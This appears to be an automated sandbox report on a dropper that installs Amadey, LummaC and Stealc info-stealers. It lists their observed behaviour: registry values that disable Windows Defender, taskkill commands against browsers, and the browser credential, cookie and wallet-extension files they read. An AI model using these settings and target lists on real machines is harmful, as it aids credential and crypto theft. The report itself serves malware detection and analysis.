Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_006A2622
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0069083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0069083F
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006909D5 SetUnhandledExceptionFilter, 11_2_006909D5
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00690C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00690C21
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 7148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 6796, type: MEMORYSTR
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 11_2_006D1201
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006B2BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 11_2_006B2BA5
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DB226 SendInput,keybd_event, 11_2_006DB226
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006F22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 11_2_006F22DA
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 11_2_006D0B62
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 11_2_006D1663
Source: 2ada66c192.exe, 0000000B.00000000.2593438166.0000000000732000.00000002.00000001.01000000.0000000B.sdmp, 2ada66c192.exe, 0000001E.00000002.2915748492.0000000000732000.00000002.00000001.01000000.0000000B.sdmp, 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 37df924488.exe, 37df924488.exe, 00000009.00000002.2576273292.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: dProgram Manager
Source: 9c2827fca4.exe, 0000001C.00000002.2847103308.0000000000858000.00000040.00000001.01000000.00000012.sdmp Binary or memory string: nProgram Manager
Source: 2ada66c192.exe Binary or memory string: Shell_TrayWnd
Source: firefox.exe, 00000018.00000002.2789947329.000000D7FE7FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: file.exe, 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: ^lProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ABDD91 cpuid 6_2_00ABDD91
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009FCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_009FCBEA
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006CD27A GetUserNameW, 11_2_006CD27A
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006ABB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 11_2_006ABB6F
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_006742DE
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
AV process strings found (often used to terminate AV products)
Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 6.2.skotes.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 2ada66c192.exe PID: 1364, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 7872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ae5cfd188c.exe PID: 3512, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2760593914.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2534662557.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2673057530.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2575911980.0000000000681000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 7148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets=
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s/ElectronCash
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Libertyfilplm
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: r-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Bina
Source: ae5cfd188c.exe, 0000000A.00000003.2630336262.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wu
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0,"p":"%appdata%\\Ethereum","m":g
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: ae5cfd188c.exe, 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
